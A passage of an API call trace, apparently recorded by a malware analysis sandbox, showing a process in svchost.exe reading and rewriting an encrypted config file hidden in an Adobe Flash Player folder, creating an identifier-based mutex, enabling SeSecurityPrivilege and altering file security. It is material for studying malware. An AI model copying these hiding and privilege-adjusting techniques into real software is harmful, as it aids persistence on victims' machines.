lpFileSize=0x735f2b0 | out: lpFileSize=0x735f2b0*=3089) returned 1 [0122.408] VirtualAlloc (lpAddress=0x0, dwSize=0xc11, flAllocationType=0x3000, flProtect=0x4) returned 0x53f0000 [0122.408] ReadFile (in: hFile=0x2d4, lpBuffer=0x53f0000, nNumberOfBytesToRead=0xc11, lpNumberOfBytesRead=0x735f2bc, lpOverlapped=0x0 | out: lpBuffer=0x53f0000*, lpNumberOfBytesRead=0x735f2bc*=0xc11, lpOverlapped=0x0) returned 1 [0122.415] CloseHandle (hObject=0x2d4) returned 1 [0122.415] wvnsprintfA (in: pszDest=0x5413d28, cchDest=21, pszFmt="%d", arglist=0x735f200 | out: pszDest="1476366202") returned 10 [0122.416] wvnsprintfA (in: pszDest=0x5413cc8, cchDest=21, pszFmt="%d", arglist=0x735f200 | out: pszDest="1476366203") returned 10 [0122.417] wvnsprintfA (in: pszDest=0x5413ca8, cchDest=21, pszFmt="%d", arglist=0x735f200 | out: pszDest="1476366203") returned 10 [0122.418] wvnsprintfA (in: pszDest=0x5413ce8, cchDest=21, pszFmt="%d", arglist=0x735f200 | out: pszDest="1476366203") returned 10 [0122.419] wvnsprintfA (in: pszDest=0x5413ca8, cchDest=21, pszFmt="%d", arglist=0x735f200 | out: pszDest="1476366203") returned 10 [0122.420] wvnsprintfA (in: pszDest=0x5413ca8, cchDest=21, pszFmt="%d", arglist=0x735f200 | out: pszDest="1476366203") returned 10 [0122.421] wvnsprintfA (in: pszDest=0x5413ca8, cchDest=21, pszFmt="%d", arglist=0x735f200 | out: pszDest="1476366203") returned 10 [0122.422] wvnsprintfA (in: pszDest=0x5413ca8, cchDest=21, pszFmt="%d", arglist=0x735f200 | out: pszDest="1476366203") returned 10 [0122.423] wvnsprintfA (in: pszDest=0x5413ca8, cchDest=21, pszFmt="%d", arglist=0x735f200 | out: pszDest="1476366204") returned 10 [0122.424] wvnsprintfA (in: pszDest=0x5413ca8, cchDest=21, pszFmt="%d", arglist=0x735f200 | out: pszDest="1476366204") returned 10 [0122.425] wvnsprintfA (in: pszDest=0x5413cc8, cchDest=21, pszFmt="%d", arglist=0x735f200 | out: pszDest="1476366204") returned 10 [0122.426] wvnsprintfA (in: pszDest=0x5413cc8, cchDest=21, pszFmt="%d", arglist=0x735f200 | out: pszDest="1476366204") returned 10 [0122.427] wvnsprintfA (in: pszDest=0x5413ca8, cchDest=21, pszFmt="%d", arglist=0x735f200 | out: pszDest="1476366204") returned 10 [0122.429] CreateFileW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\appdata\\roaming\\adobe\\flash player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d4 [0122.431] WriteFile (in: hFile=0x2d4, lpBuffer=0x54039c0*, nNumberOfBytesToWrite=0xd10, lpNumberOfBytesWritten=0x735f2b4, lpOverlapped=0x0 | out: lpBuffer=0x54039c0*, lpNumberOfBytesWritten=0x735f2b4, lpOverlapped=0x0) returned 1 [0122.432] CloseHandle (hObject=0x2d4) returned 1 [0122.440] ReleaseMutex (hMutex=0x1cc) returned 1 [0122.440] CloseHandle (hObject=0x1cc) returned 1 [0122.441] SetLastError (dwErrCode=0x0) [0122.441] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Fabo", ulOptions=0x0, samDesired=0x1, phkResult=0x735f5ac | out: phkResult=0x735f5ac*=0x1cc) returned 0x0 [0122.441] RegQueryValueExW (in: hKey=0x1cc, lpValueName="Onpiwaad", lpReserved=0x0, lpType=0x735f5d8, lpData=0x0, lpcbData=0x735f5bc*=0x0 | out: lpType=0x735f5d8*=0x0, lpData=0x0, lpcbData=0x735f5bc*=0x0) returned 0x2 [0122.441] RegCloseKey (hKey=0x1cc) returned 0x0 [0122.441] CreateFileW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\Desktop (create shortcut).igb" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\appdata\\roaming\\adobe\\flash player\\desktop (create shortcut).igb"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1cc [0122.442] GetFileSizeEx (in: hFile=0x1cc, lpFileSize=0x735f5b0 | out: lpFileSize=0x735f5b0*=0) returned 1 [0122.442] CloseHandle (hObject=0x1cc) returned 1 [0122.442] GetLastError () returned 0x0 [0122.442] GetLastError () returned 0x0 [0122.442] GetLocalTime (in: lpSystemTime=0x735f5c0 | out: lpSystemTime=0x735f5c0*(wYear=0x7e0, wMonth=0xa, wDayOfWeek=0x4, wDay=0xd, wHour=0xf, wMinute=0x2b, wSecond=0x18, wMilliseconds=0x354)) [0122.442] GetCurrentThreadId () returned 0xd70 [0122.442] GetCurrentProcessId () returned 0x2ec [0122.442] wvnsprintfW (in: pszDest=0x54020f0, cchDest=250, pszFmt="[%02u.%02u.%4u %02u:%02u:%02u] ver=%u.%u.%u, log=0x%04X, PID=0x%04X, TID=0x%04X, LE=%u(0x%X)\r\n%S: ", arglist=0x735f564 | out: pszDest="[13.10.2016 15:43:24] ver=2.2.5, log=0x0018, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: ") returned 86 [0122.443] wvnsprintfW (in: pszDest=0x540219c, cchDest=1962, pszFmt="DynamicConfig::getCurrent %u get crypted error %u.", arglist=0x735f5e0 | out: pszDest="DynamicConfig::getCurrent 1 get crypted error 0.") returned 48 [0122.443] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:24] ver=2.2.5, log=0x0018, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: DynamicConfig::getCurrent 1 get crypted error 0.", cchWideChar=134, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 134 [0122.443] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:24] ver=2.2.5, log=0x0018, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: DynamicConfig::getCurrent 1 get crypted error 0.", cchWideChar=134, lpMultiByteStr=0x5459150, cbMultiByte=135, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[13.10.2016 15:43:24] ver=2.2.5, log=0x0018, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: DynamicConfig::getCurrent 1 get crypted error 0.", lpUsedDefaultChar=0x0) returned 134 [0122.460] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:24] ver=2.2.5, log=0x0018, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: DynamicConfig::getCurrent 1 get crypted error 0.", cchWideChar=134, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 134 [0122.460] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:24] ver=2.2.5, log=0x0018, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: DynamicConfig::getCurrent 1 get crypted error 0.", cchWideChar=134, lpMultiByteStr=0x54595d0, cbMultiByte=135, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[13.10.2016 15:43:24] ver=2.2.5, log=0x0018, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: DynamicConfig::getCurrent 1 get crypted error 0.", lpUsedDefaultChar=0x0) returned 134 [0122.460] GetSystemTime (in: lpSystemTime=0x735f1b0 | out: lpSystemTime=0x735f1b0*(wYear=0x7e0, wMonth=0xa, wDayOfWeek=0x4, wDay=0xd, wHour=0xd, wMinute=0x2b, wSecond=0x18, wMilliseconds=0x373)) [0122.460] SystemTimeToFileTime (in: lpSystemTime=0x735f1b0, lpFileTime=0x735f1a0 | out: lpFileTime=0x735f1a0) returned 1 [0122.460] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0122.461] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x5412148, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11 [0122.461] GetUserNameExW () returned 0x1 [0122.461] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0122.461] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", cchWideChar=27, lpMultiByteStr=0x5413048, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", lpUsedDefaultChar=0x0) returned 27 [0122.462] wvnsprintfW (in: pszDest=0x735ef98, cchDest=6, pszFmt="%02X", arglist=0x735ef74 | out: pszDest="8A") returned 2 [0122.462] wvnsprintfW (in: pszDest=0x735ef98, cchDest=6, pszFmt="%02X", arglist=0x735ef74 | out: pszDest="00") returned 2 [0122.462] wvnsprintfW (in: pszDest=0x735ef98, cchDest=6, pszFmt="%02X", arglist=0x735ef74 | out: pszDest="00") returned 2 [0122.462] wvnsprintfW (in: pszDest=0x735ef98, cchDest=6, pszFmt="%02X", arglist=0x735ef74 | out: pszDest="00") returned 2 [0122.462] wvnsprintfW (in: pszDest=0x735ef98, cchDest=6, pszFmt="%02X", arglist=0x735ef74 | out: pszDest="B7") returned 2 [0122.463] wvnsprintfW (in: pszDest=0x735ef98, cchDest=6, pszFmt="%02X", arglist=0x735ef74 | out: pszDest="49") returned 2 [0122.463] wvnsprintfW (in: pszDest=0x735ef98, cchDest=6, pszFmt="%02X", arglist=0x735ef74 | out: pszDest="67") returned 2 [0122.463] wvnsprintfW (in: pszDest=0x735ef98, cchDest=6, pszFmt="%02X", arglist=0x735ef74 | out: pszDest="98") returned 2 [0122.463] wvnsprintfW (in: pszDest=0x735ef98, cchDest=6, pszFmt="%02X", arglist=0x735ef74 | out: pszDest="F6") returned 2 [0122.463] wvnsprintfW (in: pszDest=0x735ef98, cchDest=6, pszFmt="%02X", arglist=0x735ef74 | out: pszDest="14") returned 2 [0122.463] wvnsprintfW (in: pszDest=0x735ef98, cchDest=6, pszFmt="%02X", arglist=0x735ef74 | out: pszDest="59") returned 2 [0122.463] wvnsprintfW (in: pszDest=0x735ef98, cchDest=6, pszFmt="%02X", arglist=0x735ef74 | out: pszDest="35") returned 2 [0122.463] wvnsprintfW (in: pszDest=0x735ef98, cchDest=6, pszFmt="%02X", arglist=0x735ef74 | out: pszDest="AA") returned 2 [0122.463] wvnsprintfW (in: pszDest=0x735ef98, cchDest=6, pszFmt="%02X", arglist=0x735ef74 | out: pszDest="3E") returned 2 [0122.464] wvnsprintfW (in: pszDest=0x735ef98, cchDest=6, pszFmt="%02X", arglist=0x735ef74 | out: pszDest="27") returned 2 [0122.464] wvnsprintfW (in: pszDest=0x735ef98, cchDest=6, pszFmt="%02X", arglist=0x735ef74 | out: pszDest="60") returned 2 [0122.464] CreateMutexW (lpMutexAttributes=0x4ece89c, bInitialOwner=0, lpName="8A000000B7496798F6145935AA3E2760") returned 0x1cc [0122.464] WaitForSingleObject (hHandle=0x1cc, dwMilliseconds=0xffffffff) returned 0x0 [0122.464] PathSkipRootW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player") returned="Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player" [0122.464] GetFileAttributesW (lpFileName="C:\\Users") returned 0x11 [0122.464] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe") returned 0x10 [0122.465] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData") returned 0x12 [0122.465] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming") returned 0x10 [0122.465] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe") returned 0x10 [0122.465] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player") returned 0x10 [0122.465] GetCurrentThread () returned 0xfffffffe [0122.466] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x20, OpenAsSelf=0, TokenHandle=0x735f1fc | out: TokenHandle=0x735f1fc*=0x0) returned 0 [0122.466] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x735f1fc | out: TokenHandle=0x735f1fc*=0x2d4) returned 1 [0122.466] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeSecurityPrivilege", lpLuid=0x735f204 | out: lpLuid=0x735f204*(LowPart=0x8, HighPart=0)) returned 1 [0122.467] AdjustTokenPrivileges (in: TokenHandle=0x2d4, DisableAllPrivileges=0, NewState=0x735f200*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0122.467] GetLastError () returned 0x0 [0122.467] CloseHandle (hObject=0x2d4) returned 1 [0122.467] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0122.467] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x5214700, lpbSaclPresent=0x735f234, pSacl=0x735f228, lpbSaclDefaulted=0x735f230 | out: lpbSaclPresent=0x735f234, pSacl=0x735f228, lpbSaclDefaulted=0x735f230) returned 1 [0122.468] SetNamedSecurityInfoW () returned 0x0 [0122.543] LocalFree (hMem=0x5214700) returned 0x0 [0122.543] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe") returned 0x20 [0122.543] GetCurrentThread () returned 0xfffffffe [0122.543] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x20, OpenAsSelf=0, TokenHandle=0x735f1fc | out: TokenHandle=0x735f1fc*=0x0) returned 0 [0122.543] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x735f1fc | out: TokenHandle=0x735f1fc*=0x2d4) returned 1 [0122.543] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeSecurityPrivilege", lpLuid=0x735f204 | out: lpLuid=0x735f204*(LowPart=0x8, HighPart=0)) returned 1 [0122.544] AdjustTokenPrivileges (in: TokenHandle=0x2d4, DisableAllPrivileges=0, NewState=0x735f200*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0122.544] GetLastError () returned 0x0 [0122.544] CloseHandle (hObject=0x2d4) returned 1 [0122.544] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0122.544] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x5214700, lpbSaclPresent=0x735f234, pSacl=0x735f228, lpbSaclDefaulted=0x735f230 | out: lpbSaclPresent=0x735f234, pSacl=0x735f228, lpbSaclDefaulted=0x735f230) returned 1 [0122.544] SetNamedSecurityInfoW () returned 0x0 [0122.546] LocalFree (hMem=0x5214700) returned 0x0 [0122.546] CreateFileW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\appdata\\roaming\\adobe\\flash player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d4 [0122.546] GetFileSizeEx (in: hFile=0x2d4, lpFileSize=0x735f248 | out: lpFileSize=0x735f248*=3344) returned 1 [0122.546] VirtualAlloc (lpAddress=0x0, dwSize=0xd10, flAllocationType=0x3000, flProtect=0x4) returned 0x5340000 [0122.546] ReadFile (in: hFile=0x2d4, lpBuffer=0x5340000, nNumberOfBytesToRead=0xd10, lpNumberOfBytesRead=0x735f254, lpOverlapped=0x0 | out: lpBuffer=0x5340000*, lpNumberOfBytesRead=0x735f254*=0xd10, lpOverlapped=0x0) returned 1 [0122.552] CloseHandle (hObject=0x2d4) returned 1 [0122.552] wvnsprintfA (in: pszDest=0x5413ea8, cchDest=21, pszFmt="%d", arglist=0x735f198 | out: pszDest="1476366202") returned 10 [0122.553] wvnsprintfA (in: pszDest=0x5413fa8, cchDest=21, pszFmt="%d", arglist=0x735f198 | out: pszDest="1476366203") returned 10 [0122.554] wvnsprintfA (in: pszDest=0x5413f88, cchDest=21, pszFmt="%d", arglist=0x735f198 | out: pszDest="1476366203") returned 10 [0122.555] wvnsprintfA (in: pszDest=0x5413f88, cchDest=21, pszFmt="%d", arglist=0x735f198 | out: pszDest="1476366203") returned 10 [0122.556] wvnsprintfA (in: pszDest=0x5413ea8, cchDest=21, pszFmt="%d", arglist=0x735f198 | out: pszDest="1476366203") returned 10 [0122.556] wvnsprintfA (in: pszDest=0x5413f88, cchDest=21, pszFmt="%d", arglist=0x735f198 | out: pszDest="1476366203") returned 10 [0122.557] wvnsprintfA (in: pszDest=0x5413f48, cchDest=21, pszFmt="%d", arglist=0x735f198 | out: pszDest="1476366203") returned 10 [0122.558] wvnsprintfA (in: pszDest=0x5413f28, cchDest=21, pszFmt="%d", arglist=0x735f198 | out: pszDest="1476366203") returned 10 [0122.558] wvnsprintfA (in: pszDest=0x5413ea8, cchDest=21, pszFmt="%d", arglist=0x735f198 | out: pszDest="1476366204") returned 10 [0122.559] wvnsprintfA (in: pszDest=0x5413f48, cchDest=21, pszFmt="%d", arglist=0x735f198 | out: pszDest="1476366204") returned 10 [0122.560] wvnsprintfA (in: pszDest=0x5413ec8, cchDest=21, pszFmt="%d", arglist=0x735f198 | out: pszDest="1476366204") returned 10 [0122.560] wvnsprintfA (in: pszDest=0x5413f28, cchDest=21, pszFmt="%d", arglist=0x735f198 | out: pszDest="1476366204") returned 10 [0122.561] wvnsprintfA (in: pszDest=0x5413fa8, cchDest=21, pszFmt="%d", arglist=0x735f198 | out: pszDest="1476366204") returned 10 [0122.562] wvnsprintfA (in: pszDest=0x5413f88, cchDest=21, pszFmt="%d", arglist=0x735f198 | out: pszDest="1476366204") returned 10 [0122.563] CreateFileW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\appdata\\roaming\\adobe\\flash player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d4 [0122.564] WriteFile (in: hFile=0x2d4, lpBuffer=0x5403ae0*, nNumberOfBytesToWrite=0xe12, lpNumberOfBytesWritten=0x735f24c, lpOverlapped=0x0 | out: lpBuffer=0x5403ae0*, lpNumberOfBytesWritten=0x735f24c, lpOverlapped=0x0) returned 1 [0122.565] CloseHandle (hObject=0x2d4) returned 1 [0122.578] ReleaseMutex (hMutex=0x1cc) returned 1 [0122.578] CloseHandle (hObject=0x1cc) returned 1 [0122.578] SetLastError (dwErrCode=0x0) [0122.578] GetLastError () returned 0x0 [0122.578] GetLocalTime (in: lpSystemTime=0x735f630 | out: lpSystemTime=0x735f630*(wYear=0x7e0, wMonth=0xa, wDayOfWeek=0x4, wDay=0xd, wHour=0xf, wMinute=0x2b, wSecond=0x18, wMilliseconds=0x3e2)) [0122.579] GetCurrentThreadId () returned 0xd70 [0122.579] GetCurrentProcessId () returned 0x2ec [0122.579] wvnsprintfW (in: pszDest=0x54020f0, cchDest=250, pszFmt="[%02u.%02u.%4u %02u:%02u:%02u] ver=%u.%u.%u, log=0x%04X, PID=0x%04X, TID=0x%04X, LE=%u(0x%X)\r\n%S: ", arglist=0x735f5d4 | out: pszDest="[13.10.2016 15:43:24] ver=2.2.5, log=0x0019, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: ") returned 86 [0122.579] wvnsprintfW (in: pszDest=0x540219c, cchDest=1962, pszFmt="updateplugin: No plugin url.", arglist=0x735f650 | out: pszDest="updateplugin: No plugin url.") returned 28 [0122.579] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:24] ver=2.2.5, log=0x0019, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: updateplugin: No plugin url.", cchWideChar=114, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 114 [0122.579] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:24] ver=2.2.5, log=0x0019, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: updateplugin: No plugin url.", cchWideChar=114, lpMultiByteStr=0x5415030, cbMultiByte=115, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[13.10.2016 15:43:24] ver=2.2.5, log=0x0019, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: updateplugin: No plugin url.", lpUsedDefaultChar=0x0) returned 114 [0122.580] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:24] ver=2.2.5, log=0x0019, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: updateplugin: No plugin url.", cchWideChar=114, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 114 [0122.580] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:24] ver=2.2.5, log=0x0019, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: updateplugin: No plugin url.", cchWideChar=114, lpMultiByteStr=0x54150a8, cbMultiByte=115, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[13.10.2016 15:43:24] ver=2.2.5, log=0x0019, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: updateplugin: No plugin url.", lpUsedDefaultChar=0x0) returned 114 [0122.580] GetSystemTime (in: lpSystemTime=0x735f220 | out: lpSystemTime=0x735f220*(wYear=0x7e0, wMonth=0xa, wDayOfWeek=0x4, wDay=0xd, wHour=0xd, wMinute=0x2b, wSecond=0x18, wMilliseconds=0x3e2)) [0122.580] SystemTimeToFileTime (in: lpSystemTime=0x735f220, lpFileTime=0x735f210 | out: lpFileTime=0x735f210) returned 1 [0122.580] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0122.580] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x5412108, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11 [0122.581] GetUserNameExW () returned 0x1 [0122.583] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0122.583] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", cchWideChar=27, lpMultiByteStr=0x5413228, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", lpUsedDefaultChar=0x0) returned 27 [0122.584] wvnsprintfW (in: pszDest=0x735f008, cchDest=6, pszFmt="%02X", arglist=0x735efe4 | out: pszDest="8A") returned 2 [0122.584] wvnsprintfW (in: pszDest=0x735f008, cchDest=6, pszFmt="%02X", arglist=0x735efe4 | out: pszDest="00") returned 2 [0122.584] wvnsprintfW (in: pszDest=0x735f008, cchDest=6, pszFmt="%02X", arglist=0x735efe4 | out: pszDest="00") returned 2 [0122.584] wvnsprintfW (in: pszDest=0x735f008, cchDest=6, pszFmt="%02X", arglist=0x735efe4 | out: pszDest="00") returned 2 [0122.584] wvnsprintfW (in: pszDest=0x735f008, cchDest=6, pszFmt="%02X", arglist=0x735efe4 | out: pszDest="B7") returned 2 [0122.584] wvnsprintfW (in: pszDest=0x735f008, cchDest=6, pszFmt="%02X", arglist=0x735efe4 | out: pszDest="49") returned 2 [0122.585] wvnsprintfW (in: pszDest=0x735f008, cchDest=6, pszFmt="%02X", arglist=0x735efe4 | out: pszDest="67") returned 2 [0122.585] wvnsprintfW (in: pszDest=0x735f008, cchDest=6, pszFmt="%02X", arglist=0x735efe4 | out: pszDest="98") returned 2 [0122.585] wvnsprintfW (in: pszDest=0x735f008, cchDest=6, pszFmt="%02X", arglist=0x735efe4 | out: pszDest="F6") returned 2 [0122.585] wvnsprintfW (in: pszDest=0x735f008, cchDest=6, pszFmt="%02X", arglist=0x735efe4 | out: pszDest="14") returned 2 [0122.585] wvnsprintfW (in: pszDest=0x735f008, cchDest=6, pszFmt="%02X", arglist=0x735efe4 | out: pszDest="59") returned 2 [0122.585] wvnsprintfW (in: pszDest=0x735f008, cchDest=6, pszFmt="%02X", arglist=0x735efe4 | out: pszDest="35") returned 2 [0122.585] wvnsprintfW (in: pszDest=0x735f008, cchDest=6, pszFmt="%02X", arglist=0x735efe4 | out: pszDest="AA") returned 2 [0122.585] wvnsprintfW (in: pszDest=0x735f008, cchDest=6, pszFmt="%02X", arglist=0x735efe4 | out: pszDest="3E") returned 2 [0122.585] wvnsprintfW (in: pszDest=0x735f008, cchDest=6, pszFmt="%02X", arglist=0x735efe4 | out: pszDest="27") returned 2 [0122.585] wvnsprintfW (in: pszDest=0x735f008, cchDest=6, pszFmt="%02X", arglist=0x735efe4 | out: pszDest="60") returned 2 [0122.585] CreateMutexW (lpMutexAttributes=0x4ece89c, bInitialOwner=0, lpName="8A000000B7496798F6145935AA3E2760") returned 0x1cc [0122.585] WaitForSingleObject (hHandle=0x1cc, dwMilliseconds=0xffffffff) returned 0x0 [0122.585] PathSkipRootW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player") returned="Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player" [0122.585] GetFileAttributesW (lpFileName="C:\\Users") returned 0x11 [0122.586] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe") returned 0x10 [0122.586] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData") returned 0x12 [0122.586] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming") returned 0x10 [0122.586] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe") returned 0x10 [0122.586] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player") returned 0x10 [0122.586] GetCurrentThread () returned 0xfffffffe [0122.587] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x20, OpenAsSelf=0, 